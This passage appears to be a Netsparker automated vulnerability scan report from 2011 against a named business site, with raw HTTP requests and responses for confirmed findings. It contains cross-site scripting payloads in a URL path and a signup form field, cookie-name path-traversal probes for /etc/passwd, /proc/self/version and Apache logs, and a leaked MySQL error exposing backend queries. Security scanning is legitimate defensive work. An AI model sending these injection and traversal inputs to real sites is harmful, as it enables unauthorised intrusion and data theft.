OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9ficpcvlmj4usqub33hc7t8bi6; path=/
Content-Length: 3093
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = 
prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E

/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013BD)</script>

Request

GET /ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013BD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/style/dhtmlwindow.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=55pdhfu6a9j277np3g62dcp805; path=/
Content-Length: 2943
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST '"--></style></script><script>alert(0x00137E)</script>
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00137E)%3c%2fscript%3e&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:23 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=999F98F6E9BB3C737B6612458EEA3F38; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" 